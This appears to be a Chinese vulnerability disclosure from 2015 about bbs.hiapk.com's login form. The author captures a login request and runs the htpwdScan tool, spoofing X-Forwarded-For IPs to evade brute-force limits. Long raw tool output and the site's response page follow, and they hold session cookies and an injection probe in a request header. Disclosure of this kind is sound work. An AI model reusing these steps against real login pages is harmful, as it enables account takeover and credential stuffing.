2015-11-24: 细节已通知厂商并且等待厂商处理中 2015-11-25: 厂商已经确认,细节仅向厂商公开 2015-12-05: 细节向核心白帽子及相关领域专家公开 2015-12-15: 细节向普通白帽子公开 2015-12-25: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
duang~~~
我们先去注册一个账号 等会用来测试 账号密码如下
注册成功
现在我们重新登录 然后抓包
看下我们抓的包
POST http://bbs.hiapk.com/member.php?mod=logging&action=login&loginsubmit=yes&loginhash=Lx7U6 HTTP/1.1Host: bbs.hiapk.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Referer: http://bbs.hiapk.com/member.php?mod=logging&action=loginCookie: pgv_pvi=6713070778; CNZZDATA30033867=cnzz_eid%3D1649983746-1447089993-http%253A%252F%252Fwww.baidu.com%252F%26ntime%3D1447995241; CNZZDATA30052228=cnzz_eid%3D1754837298-1447091316-http%253A%252F%252Fwww.baidu.com%252F%26ntime%3D1447995074; pgv_info=ssi=s1320527239; PHPSESSID=0bnqo1rufjpeht7tlrqndpkf73; g4O_367d_noticeTitle=1; g4O_367d_saltkey=AGE238Ig; g4O_367d_lastvisit=1447994826; g4O_367d_sid=wODMwk; g4O_367d_lastact=1447998461%09connect.php%09check; g4O_367d_sendmail=1; g4O_367d_connect_last_report_time=2015-11-20; g4O_367d_connect_report_times=5; g4O_367d_connect_check_token=1X-Forwarded-For: x-for';">xxoo<!--Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 156formhash=050ef89b&referer=http%3A%2F%2Fbbs.hiapk.com%2F&username=woooyun%40qq.com&loginfield=username&password=woooyun&questionid=0&answer=&loginsubmit=true
很明显 username和passwordok我们把上面的数据保存 然后寻找登陆成功的标识
test文件是我们刚刚抓的登录包
xxx文件内容是我们刚刚注册的账号密码
msl@msl-ubuntu:~/htpwdScan$ ./htpwdScan.py -f=test -database username,password=xxx -regex="(\S+)\s+(\S+)" -err="The username or password" -fip -debug -proxy=192.168.0.187:808***********************************************************************************************************************************************[Parsed Arguments]{'basic': None, 'checkproxy': False, 'd': None, 'database': 'username,password=xxx', 'debug': True, 'err': [u'The username or password'], 'f': 'test', 'fip': True, 'fsid': None, 'get': False, 'herr': '', 'hsuc': '', 'https': False, 'no302': False, 'nov': False, 'o': '000.Cracked.Passwords.txt', 'proxy': '192.168.0.187:808', 'proxylist': '', 'regex': '(\\S+)\\s+(\\S+)', 'rheader': '', 'rnheader': '', 'rntxt': '', 'rtxt': '', 'sleep': '', 'suc': '', 't': 1, 'u': None}***********************************************************************************************************************************************[Proxy servers loaded]['192.168.0.187:808']***********************************************************************************************************************************************Job started at 14:26:31***********************************************************************************************************************************************[.]Scan username=woooyun@qq.com&password=woooyunsend: 'POST http://bbs.hiapk.com//member.php?mod=logging&action=login&loginsubmit=yes&loginhash=Lx7U6 HTTP/1.1\r\nHost: bbs.hiapk.com\r\nAccept-Encoding: identity\r\nContent-Length: 148\r\nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\r\nX-Forwarded-For: 189.236.35.171\r\nClient-IP: 189.236.35.171\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0\r\nReferer: http://bbs.hiapk.com/member.php?mod=logging&action=login\r\nCache-Control: no-cache\r\nCookie: pgv_pvi=6713070778; CNZZDATA30033867=cnzz_eid%3D1649983746-1447089993-http%253A%252F%252Fwww.baidu.com%252F%26ntime%3D1447995241; CNZZDATA30052228=cnzz_eid%3D1754837298-1447091316-http%253A%252F%252Fwww.baidu.com%252F%26ntime%3D1447995074; pgv_info=ssi=s1320527239; PHPSESSID=0bnqo1rufjpeht7tlrqndpkf73; g4O_367d_noticeTitle=1; g4O_367d_saltkey=AGE238Ig; g4O_367d_lastvisit=1447994826; g4O_367d_sid=wODMwk; g4O_367d_lastact=1447998461%09connect.php%09check; g4O_367d_sendmail=1; g4O_367d_connect_last_report_time=2015-11-20; g4O_367d_connect_report_times=5; g4O_367d_connect_check_token=1\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nusername=woooyun%40qq.com&questionid=0&loginfield=username&referer=http%3A%2F%2Fbbs.hiapk.com%2F&formhash=050ef89b&loginsubmit=true&password=woooyun'reply: 'HTTP/1.1 200 OK\r\n'header: Server: nginx/1.0.5header: Date: Fri, 20 Nov 2015 06:26:41 GMTheader: Content-Type: text/htmlheader: Transfer-Encoding: chunkedheader: Connection: keep-aliveheader: Vary: Accept-Encodingheader: X-Powered-By: PHP/5.2.17header: Vary: User-Agentheader: Set-Cookie: g4O_367d_sid=9qe97b; expires=Sat, 21-Nov-2015 06:26:41 GMT; path=/; domain=.hiapk.comheader: Set-Cookie: g4O_367d_lastact=1448000801%09member.php%09logging; expires=Sat, 21-Nov-2015 06:26:41 GMT; path=/; domain=.hiapk.comheader: Set-Cookie: g4O_367d_auth=2d50Y5MVJbTZrI6PREaRS%2BcOAcH1hCgzAqd5QuIn6MArHikJJpvV2fl5InSW5q3NDU0ndXDNyDwJREPmoIzMuc7X%2F1Sl4w; path=/; domain=.hiapk.com; httponlyheader: Set-Cookie: g4O_367d_loginuser=deleted; expires=Thu, 20-Nov-2014 06:26:40 GMT; path=/; domain=.hiapk.comheader: Set-Cookie: g4O_367d_activationauth=deleted; expires=Thu, 20-Nov-2014 06:26:40 GMT; path=/; domain=.hiapk.comheader: Set-Cookie: g4O_367d_pmnum=deleted; expires=Thu, 20-Nov-2014 06:26:40 GMT; path=/; domain=.hiapk.comheader: Set-Cookie: g4O_367d_stats_qc_reg=deleted; expires=Thu, 20-Nov-2014 06:26:40 GMT; path=/; domain=.hiapk.comheader: Set-Cookie: g4O_367d_cloudstatpost=deleted; expires=Thu, 20-Nov-2014 06:26:40 GMT; path=/; domain=.hiapk.comheader: Set-Cookie: g4O_367d_ulastactivity=aba2AdAG%2FHpxrHRhj5ZxS6PvDvFA02ISt2%2FRlYXU7RiuCsxPkYEb; expires=Sat, 19-Nov-2016 06:26:41 GMT; path=/; domain=.hiapk.com***********************************************************************************************************************************************[Response headers and response text][('x-powered-by', 'PHP/5.2.17'), ('transfer-encoding', 'chunked'), ('set-cookie', 'g4O_367d_sid=9qe97b; expires=Sat, 21-Nov-2015 06:26:41 GMT; path=/; domain=.hiapk.com, g4O_367d_lastact=1448000801%09member.php%09logging; expires=Sat, 21-Nov-2015 06:26:41 GMT; path=/; domain=.hiapk.com, g4O_367d_auth=2d50Y5MVJbTZrI6PREaRS%2BcOAcH1hCgzAqd5QuIn6MArHikJJpvV2fl5InSW5q3NDU0ndXDNyDwJREPmoIzMuc7X%2F1Sl4w; path=/; domain=.hiapk.com; httponly, g4O_367d_loginuser=deleted; expires=Thu, 20-Nov-2014 06:26:40 GMT; path=/; domain=.hiapk.com, g4O_367d_activationauth=deleted; expires=Thu, 20-Nov-2014 06:26:40 GMT; path=/; domain=.hiapk.com, g4O_367d_pmnum=deleted; expires=Thu, 20-Nov-2014 06:26:40 GMT; path=/; domain=.hiapk.com, g4O_367d_stats_qc_reg=deleted; expires=Thu, 20-Nov-2014 06:26:40 GMT; path=/; domain=.hiapk.com, g4O_367d_cloudstatpost=deleted; expires=Thu, 20-Nov-2014 06:26:40 GMT; path=/; domain=.hiapk.com, g4O_367d_ulastactivity=aba2AdAG%2FHpxrHRhj5ZxS6PvDvFA02ISt2%2FRlYXU7RiuCsxPkYEb; expires=Sat, 19-Nov-2016 06:26:41 GMT; path=/; domain=.hiapk.com'), ('vary', 'Accept-Encoding, User-Agent'), ('server', 'nginx/1.0.5'), ('connection', 'keep-alive'), ('date', 'Fri, 20 Nov 2015 06:26:41 GMT'), ('content-type', 'text/html')] \r\n <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=gbk" />\r\n<title>提示信息 - 安卓论坛 - Powered by Discuz!</title>\r\n<meta name="keywords" content="" />\r\n<meta name="description" content=",安卓论坛" />\r\n<meta name="generator" content="Discuz! X2" />\r\n<meta name="author" content="Discuz! Team and Comsenz UI Team" />\r\n<meta name="copyright" content="2001-2011 Comsenz Inc." />\r\n<meta name="MSSmartTagsPreventParsing" content="True" />\r\n<meta http-equiv="MSThemeCompatible" content="Yes" />\r\n<meta name="applicable-device" content="pc">\r\n<base href="http://bbs.hiapk.com/" /><link rel="stylesheet" type="text/css" href="data/cache/style_5_common.css?yvW" /><link rel="stylesheet" type="text/css" href="data/cache/style_5_member_logging.css?yvW" /><script src="static/js/common.js?yvW" type="text/javascript"></script>\r\n<script src="static/js/jquery-mini-1.4.4.js" type="text/javascript"></script>\r\n<script language="javascript" type="text/javascript">var STYLEID = '5', STATICURL = 'static/', IMGDIR = 'static/image/common', VERHASH = 'yvW', charset = 'gbk', discuz_uid = '29493546', cookiepre = 'g4O_367d_', cookiedomain = '.hiapk.com', cookiepath = '/', showusercard = '1', attackevasive = '0', disallowfloat = 'newthread', creditnotice = '1|威望|,2|金币|,3|技术|,4|人气|,5|资源|,6|推广|,7|帮助|,8|安卓仙豆|', defaultstyle = '', REPORTURL = 'aHR0cDovL2Jicy5oaWFway5jb20vL21lbWJlci5waHA/bW9kPWxvZ2dpbmcmYWN0aW9uPWxvZ2luJmxvZ2luc3VibWl0PXllcyZsb2dpbmhhc2g9THg3VTY=', SITEURL = 'http://bbs.hiapk.com/', JSPATH = 'static/js/';</script><meta name="application-name" content="安卓论坛" />\r\n<meta name="msapplication-tooltip" content="安卓论坛" />\r\n<meta name="msapplication-task" content="name=论坛;action-uri=http://bbs.hiapk.com/forum.php;icon-uri=http://bbs.hiapk.com/static/image/common/bbs.ico" />\r\n<meta name="msapplication-task" content="name=群组;action-uri=http://bbs.hiapk.com/group.php;icon-uri=http://bbs.hiapk.com/static/image/common/group.ico" /><meta name="msapplication-task" content="name=家园;action-uri=http://bbs.hiapk.com/home.php;icon-uri=http://bbs.hiapk.com/static/image/common/home.ico" /> \r\n<script src="static/js/script.js?yvW" type="text/javascript"></script>\r\n<script src="http://ipad.91.com/script/index/110727/jquery.lazyload.js" type="text/javascript" type="text/javascript"></script>\r\n<script src="http://www.hiapk.com/script/public_top.js" type="text/javascript" charset="utf-8"></script> \r\n<script type="text/javascript">\r\nvar OA_zones = {\r\n'new_ad_headerbanner' : 430,\r\n'ad_footerbanner1' : 432,\r\n'ad_thread3_0' : 39,\r\n'ad_thread3_1' : 40,\r\n'ad_thread3_2' : 41,\r\n'ad_thread3_3' : 42,\r\n'ad_thread3_14' : 43,\r\n'ad_top2' : 431,\r\n'ad_footerbanner2' : 433\r\n}\r\njQuery(document).ready(function() {\r\n jQuery('#p_rbihe').click(function(){\r\n jQuery(this).hide();\r\n jQuery('#p_rshow').show();\r\n });\r\n jQuery('#p_rclose').click(function() {\r\n jQuery('#p_rshow').hide();\r\n jQuery('#p_rbihe').show();\r\n });\r\n});\r\n</script>\r\n</head>\r\n<body id="nv_member" class="pg_logging" onkeydown="if(event.keyCode==27) return false;">\r\n<div id="append_parent"></div><div id="ajaxwaitid"></div>\r\n\r\n<div id="toptb" class="cl top">\r\n<div class="z top_l">\r\n<a href="http://www.hiapk.com/" target="_blank" title="安卓首页"><b>安卓首页</b></a><a href="http://news.hiapk.com/" target="_blank" title="安卓资讯">资讯</a><a href="http://wake.hiapk.com/" target="_blank" title="安卓挖客">挖客</a><a href="http://guide.hiapk.com/" target="_blank" title="安卓教程">教程</a><a href="http://rom.hiapk.com/" target="_blank" title="安卓刷机">刷机</a><a href="http://mobile.hiapk.com/" target="_blank" title="安卓手机">手机</a><a href="http://product.hiapk.com/" target="_blank" title="手机大全">手机大全</a><a href="http://gpad.hiapk.com/" target="_blank" title="安卓平板">平板</a><a href="http://aiqumi.hiapk.com/" target="_blank" title="动漫">动漫</a>|<a href="http://apk.hiapk.com/" target="_blank" title="安卓市场"><b>安卓市场</b></a><a href="http://game.hiapk.com/" target="_blank" title="安卓游戏">游戏</a><a href="http://app.hiapk.com/" target="_blank" title="安卓软件">软件</a><a href="http://pic.hiapk.com/" target="_blank" title="安卓壁纸">壁纸</a><a href="http://ring.hiapk.com/" target="_blank" title="安卓手机铃声">铃声</a><a href="http://theme.hiapk.com/" target="_blank" title="安卓手机主题">主题</a>|<a href="http://bbs.hiapk.com/" target="_blank" title="安卓论坛"><b>安卓论坛</b></a>\r\n</div>\r\n<div class="y top_r">\r\n</div>\r\n</div>\r\n\r\n\r\n<div id="qmenu_menu" class="p_pop " style="display: none;">\r\n<ul><li><a href="home.php?mod=space&do=friend" style="background-image:url(http://bbs.hiapk.com/static/image/feed/friend_b.png) !important">好友</a></li>\r\n<li><a href="home.php?mod=space&do=thread&view=me" style="background-image:url(http://bbs.hiapk.com/static/image/feed/thread_b.png) !important">帖子</a></li>\r\n<li><a href="home.php?mod=space&do=favorite&view=me" style="background-image:url(http://bbs.hiapk.com/static/image/feed/favorite_b.png) !important">收藏</a></li>\r\n<li><a href="home.php?mod=magic" style="background-image:url(http://bbs.hiapk.com/static/image/feed/magic_b.png) !important">道具</a></li>\r\n<li><a href="home.php?mod=medal" style="background-image:url(http://bbs.hiapk.com/static/image/feed/medal_b.png) !important">勋章</a></li>\r\n<li><a href="home.php?mod=task" style="background-image:url(http://bbs.hiapk.com/static/image/feed/task_b.png) !important">任务</a></li>\r\n</ul>\r\n</div>\r\n<div id="wrapper" class="pt48"><div id="hd">\r\n<div class="wp">\r\n<div class="hdc cl"><table width="319" border="0" cellspacing="0" cellpadding="0" style="float:left">\r\n <tr>\r\n<td width="165"><strong class="bbs_logo"><a href="./" style="float:left"><img src="template/hiapk/images/logo.png" alt="安卓论坛汇集大量安卓游戏,安卓软件,安卓市场,安卓刷机ROM等下载资源,是中国最大的最大安卓手机交用户交流论坛。" border="0" /></a></strong></td>\r\n<td align="left" valign="top" class="logo_wb"><a href="http://weibo.com/hiapkbbs" target="_blank" rel="nofollow">新浪微博</a><br><a href="http://t.qq.com/Hiapk_com" target="_blank" rel="nofollow" class="tx_wb">腾讯微博</a></td>\r\n </tr>\r\n</table>\r\n\r\n<div id="um">\r\n<div class="avt y"><a href="space-uid-29493546.html"><img src="http://avatar.x2.hiapk.com/uc_server/data/avatar/029/49/35/46_avatar_small.jpg" onerror="this.onerror=null;this.src='http://avatar.x2.hiapk.com/uc_server/images/noavatar_small.gif'" /></a></div>\r\n<p>\r\n<strong class="vwmy"><a href="space-uid-29493546.html" target="_blank" title="访问我的空间">xxxxxzdsds2</a></strong>\r\n <span id="xwb_allsum_29493546_container" style="display: none">\r\n <span class="pipe">|</span><a id="xwb_unread_29493546" href="#" onmouseover="showMenu(this.id)" class="new" style="background-image: url(xwb/images/bgimg/icon_logo_xweibo.png);">微博(<span id="xwb_allsum_29493546">0</span>)</a>\r\n </span>\r\n<span class="pipe">|</span><a href="connect.php?mod=config" target="_blank"><img src="static/image/common/qq_bind_small.gif" class="vm qq_bind" alt="QQ绑定" /></a>\r\n\r\n<span class="pipe">|</span><a href="home.php?mod=spacecp">设置</a>\r\n<span class="pipe">|</span><a href="home.php?mod=space&do=pm" id="pm_ntc">消息</a>\r\n<span class="pipe">|</span><a href="home.php?mod=space&do=notice" id="myprompt">提醒(1)</a><span id="myprompt_check"></span>\r\n<span class="pipe">|</span><a href="member.php?mod=logging&action=logout&formhash=050ef89b">退出</a>\r\n</p>\r\n<p>\r\n<a href="home.php?mod=spacecp&ac=credit&showcredit=1" id="extcreditmenu" onMouseOver="delayShow(this, showCreditmenu);" class="showmenu">积分: 5</a>\r\n<span class="pipe">|</span>用户组: <a href="home.php?mod=spacecp&ac=usergroup" id="g_upmine" class="xi2" onMouseOver="delayShow(this, showUpgradeinfo)">A1.安卓人工智能</a>\r\n</p>\r\n</div>\r\n</div>\r\n\r\n <div class="nav">\r\n<div class="nav_c">\r\n <div class="nav_top">\r\n <div class="nav_item z">\r\n <ul>\r\n<li id="tag_1_abcd" ><a href="http://www.hiapk.com/">安卓首页</a></li>\r\n<li class="on" id="tag_1_b7" onClick="return swap_tag_1_(7)"><a href="http://bbs.hiapk.com/">安卓论坛</a></li>\r\n<li id="tag_1_b4" ><a href="http://games.hiapk.com/" target="_blank">游戏论坛</a></li> \r\n<li id="tag_1_b4" ><a href="http://bbs.hiapk.com/forum-474-1.html" target="_blank">论坛活动</a></li>\r\n<li id="tag_1_b6" ><a href="http://apk.hiapk.com" target="_blank">安卓市场</a></li> \r\n<li id="tag_1_abc" ><a href="http://bbs.hiapk.com/waterfall-37.html" target="_blank">图片壁纸</a></li>\r\n<li id="tag_1_b4" ><a href="http://bbs.hiapk.com/forum-222-1.html" target="_blank">安卓乐园</a></li>\r\n<li id="tag_1_b4" ><a href="http://bbs.hiapk.com/#ppai" target="_blank">热门手机</a></li>\r\n<li id="tag_1_abc2" ><a href="http://bbs.hiapk.com/home.php?mod=space&do=favorite&type=forum" target="_blank">我的版块</a></li>\r\n<li id="tag_1_b4" ><a href="http://bbs.hiapk.com/plugin.php?id=dsu_paulsign:sign" target="_blank">每日签到</a></li>\r\n </ul>\r\n </div>\r\n <div class="nav_f y" id="nav_f_btn"><a href="javascript:;" id="qmenu" onMouseOver="showMenu({'ctrlid':'qmenu','pos':'34!','ctrlclass':'a','duration':2});">快捷导航</a></div>\r\n </div><div id="scbar" class="cl">\r\n <div class="s_l"></div>\r\n <div class="search_con"><form id="scbar_form" method="post" autocomplete="off" onsubmit="searchFocus($('scbar_txt'))" action="search.php?searchsubmit=yes" target="_blank">\r\n<input type="hidden" name="mod" id="scbar_mod" value="search" />\r\n<input type="hidden" name="formhash" value="050ef89b" />\r\n<input type="hidden" name="srchtype" value="title" />\r\n<input type="hidden" name="srhfid" value="0" id="dzsearchforumid" />\r\n<input type="hidden" name="srhlocality" value="member::logging" />\r\n<input type="hidden" name="sId" value="8520930" />\r\n<input type="hidden" name="ts" value="1448000801" />\r\n<input type="hidden" name="cuId" value="29493546" />\r\n<input type="hidden" name="cuName" value="woooyun@qq.com" />\r\n<input type="hidden" name="gId" value="10" />\r\n<input type="hidden" name="agId" value="0" />\r\n<input type="hidden" name="egIds" value="" />\r\n<input type="hidden" name="fmSign" value="" />\r\n<input type="hidden" name="ugSign10" value="" />\r\n<input type="hidden" name="sign" value="f964497be6f72812fb00e61bb67c5435" />\r\n<input type="hidden" name="charset" value="gbk" />\r\n<input type="hidden" name="source" value="discuz" />\r\n<input type="hidden" name="fId" value="" id="cloudsearchforumId" />\r\n<input type="hidden" name="q" id="cloudsearchquery" value="" />\r\n<table cellspacing="0" cellpadding="0">\r\n<tr>\r\n<td class="scbar_icon_td"></td>\r\n<td class="scbar_txt_td"><input type="text" name="srchtxt" id="scbar_txt" value="请输入搜索内容" autocomplete="off" /></td>\r\n<td class="scbar_type_td"><a href="javascript:;" id="scbar_type" class="showmenu xg1 xs2" onclick="showMenu(this.id)" hidefocus="true">搜索</a></td>\r\n<td class="scbar_btn_td"><button type="submit" name="searchsubmit" id="scbar_btn" class="pn pnc" value="true"><strong class="xi2 xs2">搜站内</strong></button><a id="" href="javascript:void(0);" class="st_baidu"><strong class="xi2 xs2">搜百度</strong></a></td>\r\n<td class="scbar_hot_td">\r\n<div id="scbar_hot">\r\n<strong class="xw1">热搜: </strong>\r\n\r\n<a href="http://search.bbs.hiapk.com/f/discuz?q=%CB%A2%BB%FA&source=hotsearch&sId=8520930&ts=1448000801&cuId=29493546&cuName=woooyun@qq.com&gId=10&agId=0&egIds=&fmSign=&ugSign10=&sign=f964497be6f72812fb00e61bb67c5435&charset=gbk" target="_blank">刷机</a>\r\n\r\n\r\n\r\n<a href="http://search.bbs.hiapk.com/f/discuz?q=%BF%AD%C1%A2%B5%C2&source=hotsearch&sId=8520930&ts=1448000801&cuId=29493546&cuName=woooyun@qq.com&gId=10&agId=0&egIds=&fmSign=&ugSign10=&sign=f964497be6f72812fb00e61bb67c5435&charset=gbk" target="_blank">凯立德</a>\r\n\r\n\r\n\r\n<a href="http://search.bbs.hiapk.com/f/discuz?q=root&source=hotsearch&sId=8520930&ts=1448000801&cuId=29493546&cuName=woooyun@qq.com&gId=10&agId=0&egIds=&fmSign=&ugSign10=&sign=f964497be6f72812fb00e61bb67c5435&charset=gbk" target="_blank">root</a>\r\n\r\n\r\n\r\n<a href="http://search.bbs.hiapk.com/f/discuz?q=recovery&source=hotsearch&sId=8520930&ts=1448000801&cuId=29493546&cuName=woooyun@qq.com&gId=10&agId=0&egIds=&fmSign=&ugSign10=&sign=f964497be6f72812fb00e61bb67c5435&charset=gbk" target="_blank">recovery</a>\r\n\r\n\r\n\r\n<a href="http://search.bbs.hiapk.com/f/discuz?q=%CE%A2%D0%C5&source=hotsearch&sId=8520930&ts=1448000801&cuId=29493546&cuName=woooyun@qq.com&gId=10&agId=0&egIds=&fmSign=&ugSign10=&sign=f964497be6f72812fb00e61bb67c5435&charset=gbk" target="_blank">微信</a>\r\n\r\n\r\n\r\n<a href="http://search.bbs.hiapk.com/f/discuz?q=%B5%BC%BA%BD&source=hotsearch&sId=8520930&ts=1448000801&cuId=29493546&cuName=woooyun@qq.com&gId=10&agId=0&egIds=&fmSign=&ugSign10=&sign=f964497be6f72812fb00e61bb67c5435&charset=gbk" target="_blank">导航</a>\r\n\r\n\r\n\r\n<a href="http://search.bbs.hiapk.com/f/discuz?q=%D7%D6%CC%E5&source=hotsearch&sId=8520930&ts=1448000801&cuId=29493546&cuName=woooyun@qq.com&gId=10&agId=0&egIds=&fmSign=&ugSign10=&sign=f964497be6f72812fb00e61bb67c5435&charset=gbk" target="_blank">字体</a>\r\n\r\n\r\n\r\n<a href="http://search.bbs.hiapk.com/f/discuz?q=miui&source=hotsearch&sId=8520930&ts=1448000801&cuId=29493546&cuName=woooyun@qq.com&gId=10&agId=0&egIds=&fmSign=&ugSign10=&sign=f964497be6f72812fb00e61bb67c5435&charset=gbk" target="_blank">miui</a>\r\n\r\n\r\n\r\n<a href="http://search.bbs.hiapk.com/f/discuz?q=%BF%AA%BB%FA%B6%AF%BB%AD&source=hotsearch&sId=8520930&ts=1448000801&cuId=29493546&cuName=woooyun@qq.com&gId=10&agId=0&egIds=&fmSign=&ugSign10=&sign=f964497be6f72812fb00e61bb67c5435&charset=gbk" target="_blank">开机动画</a>\r\n\r\n\r\n\r\n<a href="http://search.bbs.hiapk.com/f/discuz?q=%D3%CE%CF%B7&source=hotsearch&sId=8520930&ts=1448000801&cuId=29493546&cuName=woooyun@qq.com&gId=10&agId=0&egIds=&fmSign=&ugSign10=&sign=f964497be6f72812fb00e61bb67c5435&charset=gbk" target="_blank">游戏</a>\r\n\r\n\r\n\r\n<a href="http://search.bbs.hiapk.com/f/discuz?q=%B8%DF%B5%C2&source=hotsearch&sId=8520930&ts=1448000801&cuId=29493546&cuName=woooyun@qq.com&gId=10&agId=0&egIds=&fmSign=&ugSign10=&sign=f964497be6f72812fb00e61bb67c5435&charset=gbk" target="_blank">高德</a>\r\n\r\n\r\n\r\n<a href="http://search.bbs.hiapk.com/f/discuz?q=%BF%EC%B2%A5&source=hotsearch&sId=8520930&ts=1448000801&cuId=29493546&cuName=woooyun@qq.com&gId=10&agId=0&egIds=&fmSign=&ugSign10=&sign=f964497be6f72812fb00e61bb67c5435&charset=gbk" target="_blank">快播</a>\r\n\r\n\r\n\r\n<a href="http://search.bbs.hiapk.com/f/discuz?q=%D6%B2%CE%EF%B4%F3%D5%BD%BD%A9%CA%AC&source=hotsearch&sId=8520930&ts=1448000801&cuId=29493546&cuName=woooyun@qq.com&gId=10&agId=0&egIds=&fmSign=&ugSign10=&sign=f964497be6f72812fb00e61bb67c5435&charset=gbk" target="_blank">植物大战僵尸</a>\r\n\r\n\r\n\r\n<a href="http://search.bbs.hiapk.com/f/discuz?q=%BF%AD%C1%A2%B5%C22013&source=hotsearch&sId=8520930&ts=1448000801&cuId=29493546&cuName=woooyun@qq.com&gId=10&agId=0&egIds=&fmSign=&ugSign10=&sign=f964497be6f72812fb00e61bb67c5435&charset=gbk" target="_blank">凯立德2013</a>\r\n\r\n\r\n\r\n<a href="http://search.bbs.hiapk.com/f/discuz?q=wifi&source=hotsearch&sId=8520930&ts=1448000801&cuId=29493546&cuName=woooyun@qq.com&gId=10&agId=0&egIds=&fmSign=&ugSign10=&sign=f964497be6f72812fb00e61bb67c5435&charset=gbk" target="_blank">wifi</a>\r\n\r\n\r\n\r\n<a href="http://search.bbs.hiapk.com/f/discuz?q=%CB%F8%C6%C1&source=hotsearch&sId=8520930&ts=1448000801&cuId=29493546&cuName=woooyun@qq.com&gId=10&agId=0&egIds=&fmSign=&ugSign10=&sign=f964497be6f72812fb00e61bb67c5435&charset=gbk" target="_blank">锁屏</a>\r\n\r\n\r\n\r\n<a href="http://search.bbs.hiapk.com/f/discuz?q=%CB%A2%BB%FA%BD%CC%B3%CC&source=hotsearch&sId=8520930&ts=1448000801&cuId=29493546&cuName=woooyun@qq.com&gId=10&agId=0&egIds=&fmSign=&ugSign10=&sign=f964497be6f72812fb00e61bb67c5435&charset=gbk" target="_blank">刷机教程</a>\r\n\r\n\r\n\r\n<a href="http://search.bbs.hiapk.com/f/discuz?q=%D2%BB%BC%FCroot&source=hotsearch&sId=8520930&ts=1448000801&cuId=29493546&cuName=woooyun@qq.com&gId=10&agId=0&egIds=&fmSign=&ugSign10=&sign=f964497be6f72812fb00e61bb67c5435&charset=gbk" target="_blank">一键root</a>\r\n\r\n\r\n\r\n<a href="http://search.bbs.hiapk.com/f/discuz?q=%CB%A2%BB%FA%B0%FC&source=hotsearch&sId=8520930&ts=1448000801&cuId=29493546&cuName=woooyun@qq.com&gId=10&agId=0&egIds=&fmSign=&ugSign10=&sign=f964497be6f72812fb00e61bb67c5435&charset=gbk" target="_blank">刷机包</a>\r\n\r\n\r\n\r\n<a href="http://search.bbs.hiapk.com/f/discuz?q=%D2%BB%BC%FCroot%B9%A4%BE%DF&source=hotsearch&sId=8520930&ts=1448000801&cuId=29493546&cuName=woooyun@qq.com&gId=10&agId=0&egIds=&fmSign=&ugSign10=&sign=f964497be6f72812fb00e61bb67c5435&charset=gbk" target="_blank">一键root工具</a>\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n</table>\r\n</form>\r\n</div>\r\n <div class="s_r"></div>\r\n</div>\r\n<ul id="scbar_type_menu" class="p_pop" style="display: none;"><li><a href="javascript:;" rel="forum">帖子</a></li><li><a href="javascript:;" rel="user">用户</a></li></ul>\r\n<style type="text/css">\r\n.scbar_txt_td{width:350px;}#scbar_txt { width: 330px; }.scbar_btn_td { width: 136px; text-align: center; }#scbar_btn, .st_baidu { float: left; width: 67px; height: 33px; margin: 0 2px 0 0; padding: 0; border: none; background: #6cac2e; }.scbar_btn_td .pn strong, .scbar_btn_td .st_baidu strong { width: 67px; height: 33px; color: #fff; background-color: #6cac2e; padding: 0; margin-left: 0; line-height: 33px; }.st_baidu { margin: 0; padding: 0; line-height: 34px; color: #fff; }.st_baidu:hover { text-decoration: none; }\r\n</style>\r\n<script type="text/javascript">\r\ninitSearchmenu('scbar', 'http://search.bbs.hiapk.com/f/discuz');\r\n\r\njQuery(".st_baidu").click(function(){\r\nvar val = jQuery('#scbar_txt').attr("value"); \r\nif(val == ""||val == "请输入搜索内容"){alert("请输入关键词");return false}\r\nwindow.open("http://www.baidu.com/baidu?&word="+ val +"&s=12052907993487091575&tn=SE_hldp04152_m0x14zb4");\r\n});\r\n</script>\r\n <div class="nav_bottom clearfix">\r\n<div class="w971" id="tag_1_7" style="display:block; padding-top:5px;">\r\n <div class="nav_list clearfix" style="padding-top:1px; text-align:center;">\r\n <div id="new_ad_headerbanner" class="z"></div><div id="ad_top2" class="y"></div>\r\n </div>\r\n </div>\r\n </div>\r\n</div>\r\n </div>\r\n\r\n<ul class="p_pop h_pop" id="plugin_menu" style="display: none"> <li><a id="mn_plink_sign" href="plugin.php?id=dsu_paulsign:sign">每日签到</a></li>\r\n </ul>\r\n<div id="mu" class="cl">\r\n</div></div>\r\n</div>\r\n\r\n\r\n<div id="wp" class="wp">\r\n<div id="ct" class="wp cl w">\n<div class="nfl">\n<div class="f_c altw">\n<div id="messagetext" class="alert_right">\n<p><script type="text/javascript" reload="1">if($('succeedmessage')) {$('succeedmessage').innerHTML = '';}</script><script type="text/javascript">setTimeout("window.location.href ='http://bbs.hiapk.com/';", 3000);$('succeedmessage_href').href = 'http://bbs.hiapk.com/';$('main_message').style.display = 'none';$('main_succeed').style.display = '';$('succeedlocation').innerHTML = '欢迎您回来,A1.安卓人工智能 xxxxxzdsds2,现在将转入登录前页面';</script></p>\n<p class="alert_btnleft"><a href="http://bbs.hiapk.com/">如果你的浏览器没有自动跳转,请点击此链接</a></p>\n</div>\n</div>\n</div>\n</div></div>\r\n</div><!-- /wrapper end -->\r\n<ul id="xwb_unread_29493546_menu" class="p_pop" style="display: none">\r\n<li id="xwb_oauth2expire_29493546_container" style="display: none"><a href="home.php?mod=spacecp&ac=plugin&id=sina_xweibo_x2:home_binding" onclick="xwbUnreadCtr.hideContainer('oauth2expire');">授权失效提醒: <span id="xwb_oauth2expire_29493546">0</span></a></li>\r\n<li id="xwb_followers_29493546_container" style="display: none"><a href="index.php?m=index.fans" target="_blank" onclick="xwbUnreadCtr.hideContainer('followers');">新增粉丝: <span id="xwb_followers_29493546">0</span></a></li>\r\n<li id="xwb_comments_29493546_container" style="display: none"><a 